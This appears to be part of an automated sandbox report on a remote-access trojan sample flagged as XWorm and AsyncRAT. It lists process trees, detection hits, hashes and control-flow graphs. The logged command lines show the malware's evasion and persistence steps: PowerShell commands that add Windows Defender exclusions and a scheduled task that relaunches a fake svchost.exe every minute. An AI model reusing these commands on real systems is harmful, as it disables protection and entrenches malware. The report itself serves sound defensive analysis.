                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:16:51:03
                                                            Start date:06/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:16:51:10
                                                            Start date:06/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'a9YMw44iQq.exe'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:16:51:10
                                                            Start date:06/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:16:51:20
                                                            Start date:06/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\svchost.exe'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:16:51:20
                                                            Start date:06/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:16:51:34
                                                            Start date:06/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                            Imagebase:0x7ff6e3d50000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:16:51:34
                                                            Start date:06/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:16:51:52
                                                            Start date:06/12/2024
                                                            Path:C:\Windows\System32\schtasks.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost.exe"
                                                            Imagebase:0x7ff77b340000
                                                            File size:235'008 bytes
                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:16:51:52
                                                            Start date:06/12/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff66e660000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:16:51:53
                                                            Start date:06/12/2024
                                                            Path:C:\ProgramData\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\ProgramData\svchost.exe
                                                            Imagebase:0x280000
                                                            File size:82'944 bytes
                                                            MD5 hash:F068A2F351D11284FEE8D768A64F6C9C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\svchost.exe, Author: Joe Security
                                                            • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\svchost.exe, Author: ditekSHen
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 76%, ReversingLabs
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:16:52:01
                                                            Start date:06/12/2024
                                                            Path:C:\ProgramData\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\ProgramData\svchost.exe
                                                            Imagebase:0xe30000
                                                            File size:82'944 bytes
                                                            MD5 hash:F068A2F351D11284FEE8D768A64F6C9C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:17
                                                            Start time:16:52:02
                                                            Start date:06/12/2024
                                                            Path:C:\ProgramData\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\ProgramData\svchost.exe"
                                                            Imagebase:0x7ff799c70000
                                                            File size:82'944 bytes
                                                            MD5 hash:F068A2F351D11284FEE8D768A64F6C9C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:16:52:10
                                                            Start date:06/12/2024
                                                            Path:C:\ProgramData\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\ProgramData\svchost.exe"
                                                            Imagebase:0x690000
                                                            File size:82'944 bytes
                                                            MD5 hash:F068A2F351D11284FEE8D768A64F6C9C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:16:53:00
                                                            Start date:06/12/2024
                                                            Path:C:\ProgramData\svchost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\ProgramData\svchost.exe
                                                            Imagebase:0x610000
                                                            File size:82'944 bytes
                                                            MD5 hash:F068A2F351D11284FEE8D768A64F6C9C
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:false

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:23.4%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:33.3%
                                                              Total number of Nodes:9
                                                              Total number of Limit Nodes:0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 7ffd34889189-7ffd3488921d call 7ffd34888fa0 call 7ffd34880388 call 7ffd34888138 11 7ffd3488921f-7ffd3488924c call 7ffd34880398 0->11 12 7ffd34889251-7ffd34889274 0->12 11->12 16 7ffd3488927a-7ffd34889287 12->16 17 7ffd3488a32d-7ffd3488a334 12->17 18 7ffd348895e8-7ffd3488966a 16->18 19 7ffd3488928d-7ffd348892cb 16->19 20 7ffd3488a33e-7ffd3488a345 17->20 47 7ffd3488966c-7ffd3488968d 18->47 48 7ffd3488968f-7ffd348896c3 18->48 25 7ffd3488a308-7ffd3488a30e 19->25 26 7ffd348892d1-7ffd348892ee call 7ffd348883b8 19->26 23 7ffd3488a356 20->23 24 7ffd3488a347-7ffd3488a34f 20->24 33 7ffd3488a35d 23->33 24->23 27 7ffd3488a351 call 7ffd34880378 24->27 31 7ffd3488a310-7ffd3488a327 25->31 32 7ffd3488a362 25->32 26->25 35 7ffd348892f4-7ffd3488932e 26->35 27->23 31->16 31->17 36 7ffd3488a367-7ffd3488a3a2 32->36 33->33 44 7ffd3488938d-7ffd348893b5 35->44 45 7ffd34889330-7ffd34889383 35->45 42 7ffd3488a3a7-7ffd3488a3f4 36->42 72 7ffd3488a3f6-7ffd3488a417 42->72 73 7ffd3488a41c-7ffd3488a457 42->73 55 7ffd34889ca9-7ffd34889cd1 44->55 56 7ffd348893bb-7ffd348893c8 44->56 45->44 49 7ffd348896ca-7ffd3488970c 47->49 48->49 74 7ffd3488970e-7ffd3488972f 49->74 75 7ffd34889731-7ffd34889765 49->75 55->25 65 7ffd34889cd7-7ffd34889ce4 55->65 56->18 58 7ffd348893ce-7ffd348894c0 56->58 141 7ffd348894c6-7ffd34889598 call 7ffd34880358 58->141 142 7ffd34889c80-7ffd34889c86 58->142 65->18 67 7ffd34889cea-7ffd34889de0 65->67 86 7ffd3488a45c-7ffd3488a497 67->86 125 7ffd34889de6-7ffd34889e49 67->125 72->73 73->86 77 7ffd3488976c-7ffd34889883 call 7ffd34880358 74->77 75->77 154 7ffd34889885-7ffd348898a6 77->154 155 7ffd348898a8-7ffd348898dc 77->155 95 7ffd3488a49c-7ffd3488a4d7 86->95 103 7ffd3488a4dc-7ffd3488a517 95->103 112 7ffd3488a51c-7ffd3488a557 103->112 121 7ffd3488a55c-7ffd3488a597 112->121 130 7ffd3488a59c-7ffd3488a5ec 121->130 125->95 149 7ffd34889e4f-7ffd34889eb2 125->149 157 7ffd3488a5ee-7ffd3488a60f 130->157 158 7ffd3488a614-7ffd3488a648 130->158 141->18 142->32 143 7ffd34889c8c-7ffd34889ca3 142->143 143->55 143->56 149->103 176 7ffd34889eb8-7ffd3488a016 call 7ffd34888338 149->176 160 7ffd348898e3-7ffd3488997a 154->160 155->160 157->158 165 7ffd3488a64f 158->165 160->18 192 7ffd34889980-7ffd34889b30 call 7ffd34880358 160->192 165->165 176->112 220 7ffd3488a01c-7ffd3488a18a 176->220 192->32 239 7ffd34889b36-7ffd34889b38 192->239 220->32 257 7ffd3488a190-7ffd3488a192 220->257 239->42 240 7ffd34889b3e-7ffd34889b7c 239->240 240->36 249 7ffd34889b82-7ffd34889c0d 240->249 264 7ffd34889c5d-7ffd34889c7a 249->264 265 7ffd34889c0f-7ffd34889c56 249->265 257->130 259 7ffd3488a198-7ffd3488a1d6 257->259 259->121 269 7ffd3488a1dc-7ffd3488a26a 259->269 264->142 265->264 276 7ffd3488a2ba-7ffd3488a2e9 269->276 277 7ffd3488a26c-7ffd3488a2b3 269->277 276->32 279 7ffd3488a2eb-7ffd3488a302 276->279 277->276 279->25 279->65
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: B$CAP_^
                                                              • API String ID: 0-1844865650
                                                              • Opcode ID: f6b290b9a53f8385fd8826254d5b1034cc088a7af38888596d1de083da3ff48e
                                                              • Instruction ID: 4b69a8ca50ae0e4e752ac4ad855ad2f86fef1ab11efbe9df877d0f59bc8eef9d
                                                              • Opcode Fuzzy Hash: f6b290b9a53f8385fd8826254d5b1034cc088a7af38888596d1de083da3ff48e
                                                              • Instruction Fuzzy Hash: 6AD26470B18A094FEB98EF68C4A57B9BBE2FF98304F14457DD44DD3291DE38A8819B41

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 280 7ffd3488959a-7ffd348895c3 283 7ffd348895c5-7ffd348895e6 280->283 284 7ffd348895ed-7ffd34889621 280->284 286 7ffd34889628-7ffd3488966a 283->286 284->286 291 7ffd3488966c-7ffd3488968d 286->291 292 7ffd3488968f-7ffd348896c3 286->292 293 7ffd348896ca-7ffd3488970c 291->293 292->293 299 7ffd3488970e-7ffd3488972f 293->299 300 7ffd34889731-7ffd34889765 293->300 301 7ffd3488976c-7ffd34889883 call 7ffd34880358 299->301 300->301 321 7ffd34889885-7ffd348898a6 301->321 322 7ffd348898a8-7ffd348898dc 301->322 323 7ffd348898e3-7ffd3488997a 321->323 322->323 334 7ffd348895e8 323->334 335 7ffd34889980-7ffd34889b30 call 7ffd34880358 323->335 334->284 358 7ffd34889b36-7ffd34889b38 335->358 359 7ffd3488a362 335->359 360 7ffd3488a3a7-7ffd3488a3f4 358->360 361 7ffd34889b3e-7ffd34889b7c 358->361 362 7ffd3488a367-7ffd3488a3a2 359->362 375 7ffd3488a3f6-7ffd3488a417 360->375 376 7ffd3488a41c-7ffd3488a457 360->376 361->362 372 7ffd34889b82-7ffd34889c0d 361->372 362->360 388 7ffd34889c5d-7ffd34889c7a 372->388 389 7ffd34889c0f-7ffd34889c56 372->389 375->376 381 7ffd3488a45c-7ffd3488a497 376->381 385 7ffd3488a49c-7ffd3488a4d7 381->385 393 7ffd3488a4dc-7ffd3488a517 385->393 390 7ffd34889c80-7ffd34889c86 388->390 389->388 390->359 392 7ffd34889c8c-7ffd34889ca3 390->392 394 7ffd34889ca9-7ffd34889cd1 392->394 395 7ffd348893bb-7ffd348893c8 392->395 401 7ffd3488a51c-7ffd3488a557 393->401 399 7ffd34889cd7-7ffd34889ce4 394->399 400 7ffd3488a308-7ffd3488a30e 394->400 395->334 397 7ffd348893ce-7ffd348894c0 395->397 397->390 473 7ffd348894c6-7ffd34889598 call 7ffd34880358 397->473 399->334 403 7ffd34889cea-7ffd34889de0 399->403 400->359 404 7ffd3488a310-7ffd3488a327 400->404 413 7ffd3488a55c-7ffd3488a597 401->413 403->381 465 7ffd34889de6-7ffd34889e49 403->465 405 7ffd3488927a-7ffd34889287 404->405 406 7ffd3488a32d-7ffd3488a334 404->406 405->334 410 7ffd3488928d-7ffd348892cb 405->410 411 7ffd3488a33e-7ffd3488a345 406->411 410->400 419 7ffd348892d1-7ffd348892ee call 7ffd348883b8 410->419 416 7ffd3488a356 411->416 417 7ffd3488a347-7ffd3488a34f 411->417 425 7ffd3488a59c-7ffd3488a5ec 413->425 424 7ffd3488a35d 416->424 417->416 420 7ffd3488a351 call 7ffd34880378 417->420 419->400 430 7ffd348892f4-7ffd3488932e 419->430 420->416 424->424 451 7ffd3488a5ee-7ffd3488a60f 425->451 452 7ffd3488a614-7ffd3488a648 425->452 441 7ffd3488938d-7ffd348893b5 430->441 442 7ffd34889330-7ffd34889383 430->442 441->394 441->395 442->441 451->452 456 7ffd3488a64f 452->456 456->456 465->385 476 7ffd34889e4f-7ffd34889eb2 465->476 473->334 476->393 489 7ffd34889eb8-7ffd3488a016 call 7ffd34888338 476->489 489->401 514 7ffd3488a01c-7ffd3488a18a 489->514 514->359 532 7ffd3488a190-7ffd3488a192 514->532 532->425 533 7ffd3488a198-7ffd3488a1d6 532->533 533->413 538 7ffd3488a1dc-7ffd3488a26a 533->538 545 7ffd3488a2ba-7ffd3488a2e9 538->545 546 7ffd3488a26c-7ffd3488a2b3 538->546 545->359 548 7ffd3488a2eb-7ffd3488a302 545->548 546->545 548->399 548->400
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: B$CAP_^
                                                              • API String ID: 0-1844865650
                                                              • Opcode ID: 71a57318812011c834e091bc1688a4630333c921b1ec2ff32fb6e49d1ad7dcd8
                                                              • Instruction ID: e13c6ad70d97d389c9ea221c2bd937c18daf1ac00c540708f562647cff83080e
                                                              • Opcode Fuzzy Hash: 71a57318812011c834e091bc1688a4630333c921b1ec2ff32fb6e49d1ad7dcd8
                                                              • Instruction Fuzzy Hash: BA826770B18A094FEB98EB6CC4A57B9BBE2FF98304F14457DD44DD3291DE38A8819B41

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 549 7ffd348816d9-7ffd34881710 551 7ffd34881fcf 549->551 552 7ffd34881716-7ffd34881822 call 7ffd34880650 * 7 call 7ffd34880a30 549->552 554 7ffd34881fd4-7ffd3488201b 551->554 590 7ffd34881824-7ffd3488182b 552->590 591 7ffd3488182c-7ffd348818a3 call 7ffd348804c0 call 7ffd348804b8 call 7ffd34880358 call 7ffd34880368 552->591 590->591 606 7ffd348818b6-7ffd348818c6 591->606 607 7ffd348818a5-7ffd348818af 591->607 610 7ffd348818ee-7ffd3488190e 606->610 611 7ffd348818c8-7ffd348818e7 call 7ffd34880358 606->611 607->606 617 7ffd34881910-7ffd3488191a call 7ffd34880378 610->617 618 7ffd3488191f-7ffd3488194a 610->618 611->610 617->618 623 7ffd3488194c-7ffd34881956 618->623 624 7ffd34881957-7ffd34881983 call 7ffd34880ff8 618->624 623->624 631 7ffd34881a23-7ffd34881ab1 624->631 632 7ffd34881989-7ffd34881a1e 624->632 652 7ffd34881ab8-7ffd34881bf6 call 7ffd34881328 call 7ffd348812b0 call 7ffd34880388 call 7ffd34880398 631->652 632->652 675 7ffd34881c44-7ffd34881c77 652->675 676 7ffd34881bf8-7ffd34881c0f 652->676 687 7ffd34881c9c-7ffd34881ccc 675->687 688 7ffd34881c79-7ffd34881c9a 675->688 681 7ffd34881c11-7ffd34881c17 676->681 682 7ffd34881c19-7ffd34881c2b 676->682 681->682 682->675 686 7ffd34881c2d-7ffd34881c3a 682->686 686->675 690 7ffd34881c3c-7ffd34881c42 686->690 692 7ffd34881cd4-7ffd34881d0b 687->692 688->692 690->675 698 7ffd34881d30-7ffd34881d60 692->698 699 7ffd34881d0d-7ffd34881d2e 692->699 701 7ffd34881d68-7ffd34881d69 698->701 699->701 702 7ffd34881d6a-7ffd34881db6 701->702 707 7ffd34881db8-7ffd34881e2e call 7ffd348803a8 call 7ffd348811d0 call 7ffd348804b0 702->707 707->554 718 7ffd34881e34-7ffd34881e7c 707->718 718->554 723 7ffd34881e82-7ffd34881efd call 7ffd348809d0 call 7ffd34880ff8 718->723 736 7ffd34881f04-7ffd34881faf 723->736 737 7ffd34881eff call 7ffd34881248 723->737 750 7ffd34881fb6-7ffd34881fce 736->750 737->736
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CAP_^
                                                              • API String ID: 0-2920077663
                                                              • Opcode ID: a81b4b958df6ec2fb04cd53230a9f1aac2fb5ee4fc9f9261eefc1162634b7b06
                                                              • Instruction ID: 45b2787a9300608371f91baddfb9e46ca06980ccc5ca3accdd7e49125719ca5f
                                                              • Opcode Fuzzy Hash: a81b4b958df6ec2fb04cd53230a9f1aac2fb5ee4fc9f9261eefc1162634b7b06
                                                              • Instruction Fuzzy Hash: 9852B520B18A494FE7A8FB6C84B96B977D2FF99300F540579E44EC32D6DE38B8419781

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 773 7ffd34887ad1-7ffd34887b8d CheckRemoteDebuggerPresent 777 7ffd34887b8f 773->777 778 7ffd34887b95-7ffd34887bd8 773->778 777->778
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd
                                                              Similarity
                                                              • API ID: CheckDebuggerPresentRemote
                                                              • String ID:
                                                              • API String ID: 3662101638-0
                                                              • Opcode ID: e2264ac129f1242ffdbac6eaad9e60732acdc59712dbbd8a4cb9e3209a6df534
                                                              • Instruction ID: 26d78beed20873a197d743e974a718d0a076c37cacf1358094f3f806b9cf6cc7
                                                              • Opcode Fuzzy Hash: e2264ac129f1242ffdbac6eaad9e60732acdc59712dbbd8a4cb9e3209a6df534
                                                              • Instruction Fuzzy Hash: F731F3319087588FCB58DF98C8866E97BE0FF65321F04426AD489D7292DB34A846CB91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 857 7ffd34886116-7ffd34886123 858 7ffd3488612e-7ffd348861f7 857->858 859 7ffd34886125-7ffd3488612d 857->859 863 7ffd34886263 858->863 864 7ffd348861f9-7ffd34886202 858->864 859->858 866 7ffd34886265-7ffd3488628a 863->866 864->863 865 7ffd34886204-7ffd34886210 864->865 867 7ffd34886212-7ffd34886224 865->867 868 7ffd34886249-7ffd34886261 865->868 873 7ffd3488628c-7ffd34886295 866->873 874 7ffd348862f6 866->874 869 7ffd34886228-7ffd3488623b 867->869 870 7ffd34886226 867->870 868->866 869->869 872 7ffd3488623d-7ffd34886245 869->872 870->869 872->868 873->874 876 7ffd34886297-7ffd348862a3 873->876 875 7ffd348862f8-7ffd348863a0 874->875 887 7ffd348863a2-7ffd348863ac 875->887 888 7ffd3488640e 875->888 877 7ffd348862dc-7ffd348862f4 876->877 878 7ffd348862a5-7ffd348862b7 876->878 877->875 880 7ffd348862bb-7ffd348862ce 878->880 881 7ffd348862b9 878->881 880->880 882 7ffd348862d0-7ffd348862d8 880->882 881->880 882->877 887->888 890 7ffd348863ae-7ffd348863bb 887->890 889 7ffd34886410-7ffd34886439 888->889 897 7ffd348864a3 889->897 898 7ffd3488643b-7ffd34886446 889->898 891 7ffd348863f4-7ffd3488640c 890->891 892 7ffd348863bd-7ffd348863cf 890->892 891->889 893 7ffd348863d3-7ffd348863e6 892->893 894 7ffd348863d1 892->894 893->893 896 7ffd348863e8-7ffd348863f0 893->896 894->893 896->891 899 7ffd348864a5-7ffd34886536 897->899 898->897 900 7ffd34886448-7ffd34886456 898->900 908 7ffd3488653c-7ffd3488654b 899->908 901 7ffd3488648f-7ffd348864a1 900->901 902 7ffd34886458-7ffd3488646a 900->902 901->899 904 7ffd3488646e-7ffd34886481 902->904 905 7ffd3488646c 902->905 904->904 906 7ffd34886483-7ffd3488648b 904->906 905->904 906->901 909 7ffd34886553-7ffd348865b8 call 7ffd348865d4 908->909 910 7ffd3488654d 908->910 917 7ffd348865bf-7ffd348865d3 909->917 918 7ffd348865ba 909->918 910->909 918->917
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 179017b53f054d3a3ce3b23a2d4b5ff0be5b99e685d8849f2f1b86d9443b3292
                                                              • Instruction ID: 293d9f849fad26742f2709656b35dd133ee6dbd90dead85d2bed16845d00580c
                                                              • Opcode Fuzzy Hash: 179017b53f054d3a3ce3b23a2d4b5ff0be5b99e685d8849f2f1b86d9443b3292
                                                              • Instruction Fuzzy Hash: 2EF1B430A0CA8D8FEBA8DF28D8557E977E1FF55310F04426EE84DC7291DB38A9458B81

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 919 7ffd348872d2-7ffd348872df 920 7ffd348872e1-7ffd348872e9 919->920 921 7ffd348872ea-7ffd348873b7 919->921 920->921 925 7ffd34887423 921->925 926 7ffd348873b9-7ffd348873c2 921->926 927 7ffd34887425-7ffd3488744a 925->927 926->925 928 7ffd348873c4-7ffd348873d0 926->928 935 7ffd3488744c-7ffd34887455 927->935 936 7ffd348874b6 927->936 929 7ffd348873d2-7ffd348873e4 928->929 930 7ffd34887409-7ffd34887421 928->930 931 7ffd348873e8-7ffd348873fb 929->931 932 7ffd348873e6 929->932 930->927 931->931 934 7ffd348873fd-7ffd34887405 931->934 932->931 934->930 935->936 938 7ffd34887457-7ffd34887463 935->938 937 7ffd348874b8-7ffd348874dd 936->937 944 7ffd348874df-7ffd348874e9 937->944 945 7ffd3488754b 937->945 939 7ffd3488749c-7ffd348874b4 938->939 940 7ffd34887465-7ffd34887477 938->940 939->937 942 7ffd3488747b-7ffd3488748e 940->942 943 7ffd34887479 940->943 942->942 946 7ffd34887490-7ffd34887498 942->946 943->942 944->945 947 7ffd348874eb-7ffd348874f8 944->947 948 7ffd3488754d-7ffd3488757b 945->948 946->939 949 7ffd34887531-7ffd34887549 947->949 950 7ffd348874fa-7ffd3488750c 947->950 955 7ffd3488757d-7ffd34887588 948->955 956 7ffd348875eb 948->956 949->948 951 7ffd34887510-7ffd34887523 950->951 952 7ffd3488750e 950->952 951->951 954 7ffd34887525-7ffd3488752d 951->954 952->951 954->949 955->956 957 7ffd3488758a-7ffd34887598 955->957 958 7ffd348875ed-7ffd348876c5 956->958 959 7ffd348875d1-7ffd348875e9 957->959 960 7ffd3488759a-7ffd348875ac 957->960 968 7ffd348876cb-7ffd348876da 958->968 959->958 961 7ffd348875b0-7ffd348875c3 960->961 962 7ffd348875ae 960->962 961->961 964 7ffd348875c5-7ffd348875cd 961->964 962->961 964->959 969 7ffd348876e2-7ffd34887744 call 7ffd34887760 968->969 970 7ffd348876dc 968->970 977 7ffd3488774b-7ffd3488775f 969->977 978 7ffd34887746 969->978 970->969 978->977
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1b3ed3265b750d73b2cd5a53030d102071bb57e5579bf4fc9bf3d6efcb2612ef
                                                              • Instruction ID: 93174064e4b8d98bf4ec8524f339314b86221e7ec062c98c2c374a603d2391d6
                                                              • Opcode Fuzzy Hash: 1b3ed3265b750d73b2cd5a53030d102071bb57e5579bf4fc9bf3d6efcb2612ef
                                                              • Instruction Fuzzy Hash: 9DE1A530A08A4E8FEBA8DF28C8A57E977E1FF55310F14426ED84DC7291DF78A9458781

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ce25af44c21f644034ac8b9c59faf01d0d1c4adb56f36ce0e56e353008b3f76
                                                              • Instruction ID: 74e863e4f9cdf8b211d61f9f7f68b325bd0e5fba11f32cb138dd38c158b4e45e
                                                              • Opcode Fuzzy Hash: 3ce25af44c21f644034ac8b9c59faf01d0d1c4adb56f36ce0e56e353008b3f76
                                                              • Instruction Fuzzy Hash: 39C19271B1CA494FEBD8EB6884B52B977D2FF99304F04417AD14ED32D2DE2CA8419741
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.3413977158.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ffd34880000_a9YMw44iQq.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0f835e9a816c945bead5d2c0d2fdd9ce6bd1eb9f531422435feaa0804a78c68c
                                                              • Instruction ID: a549a36555aa6379072bcf6142cff1b4922f6f725eae93d50527783185db60cb
                                                              • Opcode Fuzzy Hash: 0f835e9a816c945bead5d2c0d2fdd9ce6bd1eb9f531422435feaa0804a78c68c
                                                              • Instruction Fuzzy Hash: B2510214B0E6C54FE796A7B888B4276BFD9DF87215B1805FBE0C9C7193DD186806C342
